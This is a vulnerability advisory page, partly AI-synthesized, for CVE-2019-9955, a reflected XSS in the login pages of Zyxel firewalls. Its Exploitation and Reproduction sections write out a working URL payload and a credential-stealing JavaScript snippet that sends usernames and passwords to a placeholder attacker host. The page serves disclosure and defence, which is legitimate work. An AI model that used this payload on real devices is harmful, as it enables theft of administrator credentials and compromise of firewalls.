VYPR
← All advisories
Unrated severityNVD Advisory· Published Apr 22, 2019· Updated Aug 4, 2024

CVE-2019-9955

CVE-2019-9955

Description

Reflected XSS in Zyxel firewall login pages via unsanitized mp_idx parameter allows credential theft.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Reflected XSS in Zyxel firewall login pages via unsanitized mp_idx parameter allows credential theft.

Vulnerability

A reflected Cross-Site Scripting (XSS) vulnerability exists in the login pages of multiple Zyxel devices, including ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 [1][2]. The flaw lies in the weblogin.cgi and webauth_relogin.cgi scripts [1]. The mp_idx parameter is included unsanitized in the response, allowing arbitrary JavaScript injection. The vulnerable firmware version is V4.31 [1]. No authentication is required to reach the affected pages [2].

Exploitation

An attacker can exploit this by crafting a malicious URL containing a payload in the mp_idx parameter. For example, GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);// [1]. The attacker hosts a malicious JavaScript file (e.g., named z) on an attacker-controlled server. This script captures login credentials (username and password) when a victim clicks the login button and exfiltrates them to the attacker [1]. The attacker needs to trick a user into visiting the crafted link; no prior authentication is required [2].

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session on the Zyxel device login page [1]. The primary impact is the potential theft of administrator credentials, leading to full compromise of the firewall's administrative interface. This can result in unauthorized access to the network, configuration changes, and further internal attacks. The attack does not require any privileges and is performed remotely [1][2].

Mitigation

Zyxel released firmware patches to address CVE-2019-9955. Fixed firmware versions include 433ABFU0ITS-WK12-r87753 for ATP500, 433AALA0ITS-WK12-r87753 for USG40, 433AAPL0ITS-WK12-r87753 for USG1900, 433AAAC0ITS-WK12-r87753 for ZyWALL1100, and 433AAAB0ITS-WK12-r87753 for ZyWALL310 [2]. Users should apply the appropriate firmware update for their device from the vendor's FTP site. As a workaround, avoid clicking on untrusted links and ensure the login page uses HTTPS. No workaround involving configuration changes is publicly available.

References
  1. OffSec’s Exploit Database Archive
  2. Zyxel Devices Vulnerable to Cross-Site Scripting on Login page

AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

3

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing input sanitization of the 'mp_idx' parameter allows reflected cross-site scripting (XSS) in the login page JavaScript context."

Attack vector

An attacker crafts a URL containing the `mp_idx` parameter with a payload that closes the existing JavaScript string and injects a jQuery `$.getScript()` call to load a malicious external script [ref_id=1]. When a victim visits this crafted URL on the device's login page, the unsanitized `mp_idx` value is reflected into the page's inline JavaScript, causing the browser to execute the attacker's script [ref_id=1]. The injected script can then capture the victim's login credentials when the form is submitted and exfiltrate them to an attacker-controlled host [ref_id=1].

Affected code

The vulnerability exists in the `weblogin.cgi` and `webauth_relogin.cgi` endpoints on Zyxel devices running firmware version V4.31 [ref_id=1]. The `mp_idx` parameter is reflected into a JavaScript variable assignment without sanitization, as shown in the response where the attacker's payload appears directly in `var mp_idx = "";$.getScript('//$LHOST/z');//";` [ref_id=1].

What the fix does

The advisory does not include a patch diff or vendor fix details [ref_id=1]. The remediation guidance implied by the disclosure is that the `mp_idx` parameter must be properly sanitized or encoded before being reflected into the JavaScript context of the login page response [ref_id=1]. Without such sanitization, an attacker can break out of the existing JavaScript string assignment and inject arbitrary script code.

Preconditions

  • networkThe victim must be able to reach the Zyxel device's login page (weblogin.cgi or webauth_relogin.cgi) over the network
  • inputThe attacker must host a malicious JavaScript file on an attacker-controlled server reachable by the victim's browser
  • inputThe victim must click or be redirected to a crafted URL containing the malicious mp_idx parameter

Reproduction

1. Host a JavaScript file named `z` (or any single character) on an attacker-controlled server (`$LHOST`). The file contains: `$("button").click(function() { $.get("//$LHOST", { username: $("input:text").val(), password: $("input:password").val(), host: location.hostname}); });` [ref_id=1]. 2. Send the victim a crafted GET request to the target Zyxel device: `GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);// HTTP/1.1` with `Host: $RHOST` [ref_id=1]. 3. When the victim loads this URL, the `mp_idx` value is reflected unsanitized into the page's JavaScript, causing the browser to fetch and execute the attacker's script [ref_id=1]. 4. When the victim submits the login form, the attacker's server receives the credentials via a GET request containing `username`, `password`, and `host` parameters [ref_id=1].

Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

5

News mentions

0

No linked articles in our index yet.